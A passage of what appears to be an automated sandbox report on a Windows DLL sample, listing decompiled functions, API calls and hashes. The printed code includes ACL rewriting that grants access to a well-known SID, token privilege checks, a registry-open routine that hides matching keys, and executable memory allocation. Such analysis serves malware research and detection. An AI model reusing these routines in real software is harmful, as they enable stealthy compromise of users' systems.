                                                                                                        • Instruction Fuzzy Hash: CF4132B3214344ABD220DB95DC98FBB73ACEBD8750F10462EF959D2390E734A8059772
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982090, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 124memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 22%
                                                                                                        			E70982090(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v40;
				char _v48;
				void* _v52;
				long _v56;
				long _v60;
				long _v64;
				long _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v108;
				intOrPtr _t28;
				intOrPtr _t29;
				long* _t34;
				signed int _t38;
				void* _t50;
				long _t52;
				intOrPtr _t55;

				_t28 =  *_a8;
				_t52 = 0;
				_v48 = 0;
				if(_t28 == 0) {
					_t29 = _a4;
					if(_t29 == 0) {
						goto L2;
					} else {
						_t55 = _a12;
						__imp__GetNamedSecurityInfoW(_t29, _t55, 4, 0, 0,  &_v48, 0,  &_v40); // executed
						if(_t29 != 0) {
							goto L2;
						} else {
							goto L5;
						}
					}
				} else {
					_t55 = _a12;
					__imp__GetSecurityInfo(_t28, _t55, 4, 0, 0,  &_v48, 0,  &_v40);
					if(_t28 == 0) {
						L5:
						_v68 = 0x44;
						_t50 = HeapAlloc(GetProcessHeap(), 8, 0x44);
						if(_t50 != 0) {
							_t34 =  &_v68;
							__imp__CreateWellKnownSid(1, 0, _t50, _t34);
							if(_t34 != 0) {
								_v76 = 1;
								_v80 = 0x10000000;
								_v72 = 3;
								_v64 = 0;
								_v68 = 0;
								_v52 = _t50;
								_v60 = 0;
								_v56 = 0;
								__imp__SetEntriesInAclW(1,  &_v80, _v96,  &_v92);
								_t38 =  *_v56;
								if(_t38 == 0) {
									_t38 = _v60;
									if(_t38 != 0) {
										__imp__SetNamedSecurityInfoW(_t38, _t55, 4, 0, 0, _v108, 0); // executed
										goto L11;
									}
								} else {
									__imp__SetSecurityInfo(_t38, _t55, 4, 0, 0, _v108, 0);
									L11:
									asm("sbb esi, esi");
									_t52 =  ~_t38 + 1;
								}
							}
							HeapFree(GetProcessHeap(), 0, _t50);
						}
						return _t52;
					} else {
						L2:
						return 0;
					}
				}
			}























                                                                                                        0x70982097
                                                                                                        0x7098209e
                                                                                                        0x709820a0
                                                                                                        0x709820a6
                                                                                                        0x709820d0
                                                                                                        0x709820d6
                                                                                                        0x00000000
                                                                                                        0x709820d8
                                                                                                        0x709820d8
                                                                                                        0x709820ed
                                                                                                        0x709820f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709820f5
                                                                                                        0x709820a8
                                                                                                        0x709820a8
                                                                                                        0x709820bd
                                                                                                        0x709820c5
                                                                                                        0x709820f7
                                                                                                        0x709820fc
                                                                                                        0x70982111
                                                                                                        0x70982115
                                                                                                        0x7098211b
                                                                                                        0x70982124
                                                                                                        0x7098212c
                                                                                                        0x70982143
                                                                                                        0x7098214b
                                                                                                        0x70982153
                                                                                                        0x7098215b
                                                                                                        0x7098215f
                                                                                                        0x70982163
                                                                                                        0x70982167
                                                                                                        0x7098216b
                                                                                                        0x7098216f
                                                                                                        0x70982179
                                                                                                        0x7098217d
                                                                                                        0x70982193
                                                                                                        0x70982199
                                                                                                        0x709821a7
                                                                                                        0x00000000
                                                                                                        0x709821a7
                                                                                                        0x7098217f
                                                                                                        0x7098218b
                                                                                                        0x709821ad
                                                                                                        0x709821b1
                                                                                                        0x709821b3
                                                                                                        0x709821b3
                                                                                                        0x7098217d
                                                                                                        0x709821bd
                                                                                                        0x709821bd
                                                                                                        0x709821cc
                                                                                                        0x709820c9
                                                                                                        0x709820c9
                                                                                                        0x709820cf
                                                                                                        0x709820cf
                                                                                                        0x709820c5

                                                                                                        APIs
                                                                                                        • GetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?,00000100,00000000,00000000,?,?,709821ED,7098F3C8,00000008), ref: 709820BD
                                                                                                        • GetNamedSecurityInfoW.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?,00000100,00000000,00000000,?,?,709821ED,7098F3C8,00000008), ref: 709820ED
                                                                                                        • GetProcessHeap.KERNEL32 ref: 70982104
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098210B
                                                                                                        • CreateWellKnownSid.ADVAPI32(00000001,00000000,00000000,?), ref: 70982124
                                                                                                        • SetEntriesInAclW.ADVAPI32(00000001,?,?,?), ref: 7098216F
                                                                                                        • SetSecurityInfo.ADVAPI32(00000000,?,00000004,00000000,00000000,?,00000000), ref: 7098218B
                                                                                                        • SetNamedSecurityInfoW.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 709821A7
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 709821B6
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709821BD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: HeapInfoSecurity$NamedProcess$AllocCreateEntriesFreeKnownWell
                                                                                                        • String ID: D
                                                                                                        • API String ID: 1714474399-2746444292
                                                                                                        • Opcode ID: 67737583983b2b76e718355d998930ec119077133bb92ac38dd96d5fdc51d820
                                                                                                        • Instruction ID: 4333cdb5d39f382f2c646c1232eaecf6024f6f1d15f4bdf58e913b08543b6954
                                                                                                        • Opcode Fuzzy Hash: 67737583983b2b76e718355d998930ec119077133bb92ac38dd96d5fdc51d820
                                                                                                        • Instruction Fuzzy Hash: E9411AF2218305AFE7108F95CC88F6BBBBCEB85798F50492DF65286290D675DC049B62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709833D0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 89COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 68%
                                                                                                        			E709833D0(void* _a4) {
				void _v0;
				void* _v16;
				void _v72;
				long _v76;
				long _v80;
				long _v84;
				void* _v88;
				char _v96;
				DWORD* _t32;
				int _t36;
				long _t52;

				_t52 = _a4;
				_v76 = 0;
				_v84 = _t52;
				if(_t52 != 0 || OpenProcessToken(0xffffffff, 0xa,  &_v84) != 0) {
					_a4 = 0;
					_v80 = 0;
					if( *0x7098f2ac <= 5) {
						L7:
						DuplicateToken(_v84, 1,  &_a4);
						if(_v0 != 0) {
							goto L8;
						}
					} else {
						_t36 = GetTokenInformation(_v84, 0x12,  &_v72, 4,  &_v80); // executed
						if(_t36 != 0 && _v76 == 3) {
							GetTokenInformation(_v88, 0x13,  &_v0, 4,  &_v84);
						}
						if(_v0 != 0) {
							L8:
							_t32 =  &_v84;
							_v84 = 0x44;
							__imp__CreateWellKnownSid(0x1a, 0,  &_v72, _t32);
							if(_t32 != 0) {
								__imp__CheckTokenMembership(_v16,  &_v88,  &_v96);
							}
							FindCloseChangeNotification(_v16); // executed
						} else {
							goto L7;
						}
					}
					if(_t52 == 0) {
						CloseHandle(_v88);
					}
					return _v80;
				} else {
					return _v76;
				}
			}














                                                                                                        0x709833d4
                                                                                                        0x709833d8
                                                                                                        0x709833e0
                                                                                                        0x709833e6
                                                                                                        0x7098340d
                                                                                                        0x70983415
                                                                                                        0x7098341d
                                                                                                        0x70983463
                                                                                                        0x7098346f
                                                                                                        0x7098347a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098341f
                                                                                                        0x70983439
                                                                                                        0x7098343d
                                                                                                        0x70983459
                                                                                                        0x70983459
                                                                                                        0x70983461
                                                                                                        0x7098347c
                                                                                                        0x7098347c
                                                                                                        0x7098348a
                                                                                                        0x70983492
                                                                                                        0x7098349a
                                                                                                        0x709834ab
                                                                                                        0x709834ab
                                                                                                        0x709834b6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983461
                                                                                                        0x709834ba
                                                                                                        0x709834c1
                                                                                                        0x709834c1
                                                                                                        0x709834cc
                                                                                                        0x709834cd
                                                                                                        0x709834d5
                                                                                                        0x709834d5

                                                                                                        APIs
                                                                                                        • OpenProcessToken.ADVAPI32(000000FF,0000000A, Fw), ref: 709833F1
                                                                                                        • GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?,750D4AB0), ref: 70983439
                                                                                                        • GetTokenInformation.ADVAPI32(00000000,00000013(TokenIntegrityLevel),?,00000004,?), ref: 70983459
                                                                                                        • DuplicateToken.ADVAPI32(?,00000001,00000000), ref: 7098346F
                                                                                                        • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,00000000), ref: 70983492
                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,00000044,?), ref: 709834AB
                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 709834B6
                                                                                                        • CloseHandle.KERNEL32(?), ref: 709834C1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Token$CloseInformation$ChangeCheckCreateDuplicateFindHandleKnownMembershipNotificationOpenProcessWell
                                                                                                        • String ID: Fw$D
                                                                                                        • API String ID: 1214873377-4042606419
                                                                                                        • Opcode ID: a3720729945616fe58f388d905c732c763d47f0a1f997908e5d7a30b28f97e88
                                                                                                        • Instruction ID: 7eebac51246d02bccb61b8b3590deb060152146875fa054b78dab7fdf22d9949
                                                                                                        • Opcode Fuzzy Hash: a3720729945616fe58f388d905c732c763d47f0a1f997908e5d7a30b28f97e88
                                                                                                        • Instruction Fuzzy Hash: A03145B2208305AFD701CF65C844F6BB7F9AB84B54F00891DF696872D0D774E809DB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70988700, Relevance: 7.6, APIs: 5, Instructions: 94stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 59%
                                                                                                        			E70988700(long _a4, WCHAR* _a8, signed int _a12, long _a16, signed int _a28, signed int _a32, struct HWND__* _a36, struct HMENU__* _a40, struct HINSTANCE__* _a44, void* _a48) {
				short _v520;
				signed int _t16;
				struct HWND__* _t21;
				long _t35;
				intOrPtr _t37;
				long _t39;
				WCHAR* _t40;
				int _t43;
				struct HWND__* _t55;

				_t35 = _a16;
				if((_t35 & 0x40000000) == 0 || _t35 < 0) {
					_t16 = 1;
					_t35 = _t35 & 0xefffffff;
					_t39 = 0x8000080;
				} else {
					_t39 = _a4;
					_t16 = 0;
				}
				asm("sbb eax, eax");
				_t21 = CreateWindowExW(_t39, _a8,  !( ~_t16) & _a12, _t35,  ~_a28,  ~_a32, 0, 0, _a36, _a40, _a44, _a48); // executed
				_t55 = _t21;
				_t43 = GetClassNameW(_t55,  &_v520, 0x103);
				if(_t43 <= 0) {
					L10:
					return _t55;
				} else {
					_t40 =  *0x7098f610; // 0x77fbf8
					if(lstrcmpiW( &_v520, _t40) != 0) {
						if(_t43 > 1) {
							_t37 =  *0x7098f608; // 0x7982c4
							if(lstrcmpiW( &_v520, _t37 + 2) == 0) {
								 *0x7098f3cc = _t55;
								 *0x7098f668(_t55, 4);
								 *0x7098f674(_t55, 0, 0, 0, 1, 1, 0x1a);
							}
						}
						goto L10;
					} else {
						DestroyWindow(_t55);
						return 0;
					}
				}
			}












                                                                                                        0x70988700
                                                                                                        0x70988710
                                                                                                        0x709887c6
                                                                                                        0x709887cb
                                                                                                        0x709887d1
                                                                                                        0x7098871e
                                                                                                        0x7098871e
                                                                                                        0x70988725
                                                                                                        0x70988725
                                                                                                        0x70988763
                                                                                                        0x7098877a
                                                                                                        0x70988789
                                                                                                        0x70988793
                                                                                                        0x70988797
                                                                                                        0x70988817
                                                                                                        0x70988822
                                                                                                        0x70988799
                                                                                                        0x70988799
                                                                                                        0x709887af
                                                                                                        0x709887de
                                                                                                        0x709887e0
                                                                                                        0x709887f3
                                                                                                        0x709887f8
                                                                                                        0x709887fe
                                                                                                        0x70988811
                                                                                                        0x70988811
                                                                                                        0x709887f3
                                                                                                        0x00000000
                                                                                                        0x709887b1
                                                                                                        0x709887b2
                                                                                                        0x709887c3
                                                                                                        0x709887c3
                                                                                                        0x709887af

                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(08000080,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 7098877A
                                                                                                        • GetClassNameW.USER32 ref: 7098878D
                                                                                                        • lstrcmpiW.KERNEL32(0077FBF8,0077FBF8), ref: 709887AB
                                                                                                        • DestroyWindow.USER32(00000000), ref: 709887B2
                                                                                                        • lstrcmpiW.KERNEL32(007982C2,007982C2), ref: 709887EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Windowlstrcmpi$ClassCreateDestroyName
                                                                                                        • String ID:
                                                                                                        • API String ID: 2351571968-0
                                                                                                        • Opcode ID: 6006cbf14bcd1d84251ac3d9c8bd7dc9b994041ad3243ec20bc1cfeb9a41b9bf
                                                                                                        • Instruction ID: 5887c125f49d817f238331ef8bb07c82189fdf693e4c9d7bd54faf3c39d5f9ba
                                                                                                        • Opcode Fuzzy Hash: 6006cbf14bcd1d84251ac3d9c8bd7dc9b994041ad3243ec20bc1cfeb9a41b9bf
                                                                                                        • Instruction Fuzzy Hash: A431D533215311ABE7209B68CC59FEF73ACEB88710F20452DF655D32C0E674AC0087A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709881A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E709881A0(void* _a4, WCHAR* _a8, int _a12, int _a16, void** _a20) {
				long _t7;
				WCHAR* _t8;
				WCHAR* _t14;

				_t14 = _a8;
				if(_t14 == 0) {
					L3:
					_t7 = RegOpenKeyExW(_a4, _t14, _a12, _a16, _a20); // executed
					return _t7;
				} else {
					_t8 =  *0x7098f5fc; // 0x78645c
					if(StrCmpNIW(_t14, _t8, 0x1c) != 0) {
						goto L3;
					} else {
						return 2;
					}
				}
			}






                                                                                                        0x709881a1
                                                                                                        0x709881a7
                                                                                                        0x709881c5
                                                                                                        0x709881da
                                                                                                        0x709881e1
                                                                                                        0x709881a9
                                                                                                        0x709881a9
                                                                                                        0x709881ba
                                                                                                        0x00000000
                                                                                                        0x709881bc
                                                                                                        0x709881c2
                                                                                                        0x709881c2
                                                                                                        0x709881ba

                                                                                                        APIs
                                                                                                        • StrCmpNIW.SHLWAPI(?,0078645C,0000001C), ref: 709881B2
                                                                                                        • RegOpenKeyExW.KERNEL32(?,?,?,?,?), ref: 709881DA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Open
                                                                                                        • String ID: \dx
                                                                                                        • API String ID: 71445658-3316144491
                                                                                                        • Opcode ID: 8d63f9e97ab82c4830b77a8dadaa432f46c5efde2603d87ee7779406a584ae93
                                                                                                        • Instruction ID: 251fad6f7bffe205a057e1ce70969811e038e2dda84d95865805c99d8a80d119
                                                                                                        • Opcode Fuzzy Hash: 8d63f9e97ab82c4830b77a8dadaa432f46c5efde2603d87ee7779406a584ae93
                                                                                                        • Instruction Fuzzy Hash: AEE06DB2218210AFD200DF05DC48EAB77ADEBA8710F00891CB502C7391C730DC01DBB2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B840, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098B840() {
				void* _t4;
				void* _t13;

				E7098B7E0();
				_t13 =  *0x7098f6d4; // 0x0
				if(_t13 != 0) {
					E7098B830();
					return 1;
				} else {
					_t4 = HeapCreate(0, 0, 0); // executed
					 *0x7098f6d4 = _t4;
					if(_t4 == 0) {
						E7098B830();
						return 9;
					} else {
						E7098A8C0(_t4);
						E7098B830();
						return 0;
					}
				}
			}





                                                                                                        0x7098b843
                                                                                                        0x7098b848
                                                                                                        0x7098b84e
                                                                                                        0x7098b883
                                                                                                        0x7098b88b
                                                                                                        0x7098b850
                                                                                                        0x7098b853
                                                                                                        0x7098b859
                                                                                                        0x7098b860
                                                                                                        0x7098b875
                                                                                                        0x7098b87d
                                                                                                        0x7098b862
                                                                                                        0x7098b862
                                                                                                        0x7098b867
                                                                                                        0x7098b86f
                                                                                                        0x7098b86f
                                                                                                        0x7098b860

                                                                                                        APIs
                                                                                                          • Part of subcall function 7098B7E0: InterlockedCompareExchange.KERNEL32(7098F6D0,00000001,00000000), ref: 7098B7F2
                                                                                                          • Part of subcall function 7098B7E0: Sleep.KERNEL32(00000001,00000000), ref: 7098B80B
                                                                                                          • Part of subcall function 7098B7E0: InterlockedCompareExchange.KERNEL32(7098F6D0,00000001,00000000), ref: 7098B817
                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000100,709891A4,?,?,?,?,?,?,?,?,00000001,4B4CA51F), ref: 7098B853
                                                                                                          • Part of subcall function 7098B830: InterlockedExchange.KERNEL32(7098F6D0,00000000), ref: 7098B837
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ExchangeInterlocked$Compare$CreateHeapSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 1766302375-0
                                                                                                        • Opcode ID: c8f09efaa1728e4c0c2f1e38150097630115500ddf3015fcbebd35cebe2db053
                                                                                                        • Instruction ID: 8cfaf80aac167519f23f06719f83f771fcd2ef9b25b22b04b4c28a87b57cdf95
                                                                                                        • Opcode Fuzzy Hash: c8f09efaa1728e4c0c2f1e38150097630115500ddf3015fcbebd35cebe2db053
                                                                                                        • Instruction Fuzzy Hash: 8DE04632A191384BD651B7F9780678E261C9F016A9F09007AF809827E0EA249C4293E3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A910, Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098A910() {
				void* _t7;
				intOrPtr* _t8;
				void _t9;
				void* _t11;

				_t7 =  *0x7098f6ec; // 0x0
				if(_t7 == 0) {
					L4:
					_t7 = VirtualAlloc(0, 0x1000, 0x3000, 0x40); // executed
					if(_t7 != 0) {
						_t2 = _t7 + 0x20; // 0x20
						_t8 = _t2;
						 *((intOrPtr*)(_t7 + 4)) = 0;
						 *((intOrPtr*)(_t7 + 8)) = 0;
						_t11 = _t8 - _t7;
						do {
							 *_t8 =  *((intOrPtr*)(_t7 + 4));
							 *((intOrPtr*)(_t7 + 4)) = _t8;
							_t11 = _t11 + 0x20;
							_t8 = _t8 + 0x20;
						} while (_t11 <= 0xfe0);
						_t9 =  *0x7098f6ec; // 0x0
						 *_t7 = _t9;
						 *0x7098f6ec = _t7;
						return _t7;
					}
				} else {
					while( *((intOrPtr*)(_t7 + 4)) == 0) {
						_t7 =  *_t7;
						if(_t7 != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L8;
					}
				}
				L8:
				return _t7;
			}







                                                                                                        0x7098a910
                                                                                                        0x7098a91a
                                                                                                        0x7098a92b
                                                                                                        0x7098a938
                                                                                                        0x7098a940
                                                                                                        0x7098a942
                                                                                                        0x7098a942
                                                                                                        0x7098a947
                                                                                                        0x7098a94a
                                                                                                        0x7098a94d
                                                                                                        0x7098a950
                                                                                                        0x7098a953
                                                                                                        0x7098a955
                                                                                                        0x7098a958
                                                                                                        0x7098a95b
                                                                                                        0x7098a95e
                                                                                                        0x7098a966
                                                                                                        0x7098a96c
                                                                                                        0x7098a96e
                                                                                                        0x00000000
                                                                                                        0x7098a96e
                                                                                                        0x00000000
                                                                                                        0x7098a920
                                                                                                        0x7098a925
                                                                                                        0x7098a929
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098a929
                                                                                                        0x7098a920
                                                                                                        0x7098a974
                                                                                                        0x7098a974

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000040,?,7098A985,7098B968,?,?,00000001,?,?,?,?,?,70982074), ref: 7098A938
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 6af6c73c667220eb344ab180cc3989e8cf25599cf5428f5e7da4e1d809f8b7b7
                                                                                                        • Instruction ID: 4d460cb3b880df002f3f287d73feb84cdb5d9ceb182c606c17a09493168d9598
                                                                                                        • Opcode Fuzzy Hash: 6af6c73c667220eb344ab180cc3989e8cf25599cf5428f5e7da4e1d809f8b7b7
                                                                                                        • Instruction Fuzzy Hash: D8F04FB2A092208FE316CF15D854B4D7BE9AB48B00B26C1AAE04ADB3E5D370DC40CB85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A8D0, Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098A8D0() {
				void* _t1;
				void* _t7;

				_t1 =  *0x7098f6ec; // 0x0
				 *0x7098f6ec = 0;
				if(_t1 != 0) {
					do {
						_t7 =  *_t1;
						VirtualFree(_t1, 0, 0x8000); // executed
						_t1 = _t7;
					} while (_t7 != 0);
					return _t1;
				}
				return _t1;
			}





                                                                                                        0x7098a8d0
                                                                                                        0x7098a8d5
                                                                                                        0x7098a8e1
                                                                                                        0x7098a8f0
                                                                                                        0x7098a8f0
                                                                                                        0x7098a8fa
                                                                                                        0x7098a8fc
                                                                                                        0x7098a8fe
                                                                                                        0x00000000
                                                                                                        0x7098a903
                                                                                                        0x7098a904

                                                                                                        APIs
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,7098B8B5), ref: 7098A8FA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1263568516-0
                                                                                                        • Opcode ID: be6f92254bae242278f868b8c3e0d144d9057afc5a179a91c9f64106c2498ec3
                                                                                                        • Instruction ID: e24854c66fe1403d99478e398838ffae23fee3fcfff30179a1152c7d69cd498f
                                                                                                        • Opcode Fuzzy Hash: be6f92254bae242278f868b8c3e0d144d9057afc5a179a91c9f64106c2498ec3
                                                                                                        • Instruction Fuzzy Hash: D9D017736482259BE611870A9C04B4AB67C9B90B60F220122E900EB3E0E678EC429AA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 70987240, Relevance: 130.3, APIs: 71, Strings: 3, Instructions: 807memorytimewindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E70987240(intOrPtr _a8, char _a49, char _a50) {
				intOrPtr _v0;
				char _v3;
				short _v576;
				char _v580;
				short _v1112;
				short _v1120;
				short _v1616;
				short _v1624;
				char _v2120;
				short _v2128;
				short _v2148;
				char _v2156;
				char _v2160;
				struct HWND__* _v2172;
				char _v2176;
				void* _v2192;
				struct HWND__* _v2196;
				struct tagMSG _v2220;
				intOrPtr _v2224;
				char _v2232;
				char _v2236;
				struct _FILETIME _v2244;
				struct HWND__* _v2248;
				struct HWND__* _v2252;
				struct HWND__* _v2256;
				struct HWND__* _v2260;
				void _v2264;
				void* _v2268;
				void* _v2276;
				char _v2280;
				void* _v2284;
				void* _v2288;
				void* _v2296;
				void* _v2300;
				void* _v2304;
				intOrPtr _v2308;
				signed int _v2312;
				short _v2316;
				intOrPtr _v2320;
				void* _v2340;
				short _v2348;
				int _v2352;
				short _v2356;
				short _v2360;
				long _v2364;
				long _v2368;
				int _v2372;
				intOrPtr _v2376;
				intOrPtr _v2380;
				void* _v2396;
				int _v2400;
				signed int _t260;
				signed int _t261;
				char _t263;
				intOrPtr _t264;
				int _t271;
				int _t272;
				void* _t280;
				signed short _t281;
				intOrPtr _t282;
				int _t288;
				int _t292;
				struct HWND__* _t295;
				void* _t298;
				int _t304;
				void** _t305;
				void* _t307;
				signed char _t310;
				signed int _t311;
				WCHAR* _t316;
				WCHAR* _t317;
				signed int _t325;
				signed int _t326;
				void* _t329;
				intOrPtr _t331;
				long _t335;
				int _t346;
				struct HWND__* _t348;
				struct HWND__* _t351;
				long _t356;
				char* _t359;
				struct HWND__* _t385;
				int _t388;
				intOrPtr _t392;
				char _t394;
				intOrPtr _t395;
				int _t398;
				intOrPtr _t399;
				WCHAR* _t414;
				signed int _t415;
				WCHAR* _t421;
				signed int _t440;
				intOrPtr _t445;
				short _t446;
				signed int _t447;
				MSG* _t450;
				intOrPtr _t452;
				WCHAR* _t453;
				WCHAR* _t463;
				WCHAR* _t467;
				void* _t490;
				void* _t491;
				void* _t492;
				int _t493;
				void* _t494;
				struct HWND__* _t495;
				void* _t496;
				void* _t497;
				void _t498;
				long _t499;
				CHAR* _t500;
				void* _t501;
				void* _t503;
				void* _t508;
				void* _t510;
				void* _t511;
				void* _t512;
				void* _t514;
				void* _t516;
				CHAR* _t517;
				char* _t518;
				char* _t519;
				signed int _t520;
				void* _t522;
				void* _t523;
				void* _t524;
				void* _t525;
				void* _t527;
				void* _t528;
				void* _t529;
				void* _t537;
				void* _t538;
				void* _t547;
				void* _t559;

				_t522 = (_t520 & 0xfffffff8) - 0x908;
				_push(0x14);
				_push( &_v2232);
				L7098BF02();
				_t385 = 0;
				_t503 = VirtualAlloc(0, 0x1000, 0x1000, 4);
				if(_t503 == 0) {
					L95:
					return 0;
				} else {
					_push(0x14);
					_push( &_v2120);
					L7098BF02();
					GetLocaleInfoW(0x400, 0x5a,  &_v2128, 9);
					CharLowerW( &_v2128);
					_push(0x11c);
					_push(0x7098f3d0);
					L7098BF02();
					_push( &_v2300);
					_push( &_v2304);
					_push( &_v2296);
					 *0x7098f3d0 = 0x11c;
					_v2296 = 0;
					_v2304 = 0;
					_v2300 = 0;
					L7098BF44();
					 *0x7098f3dc = _v2312 & 0x0000ffff;
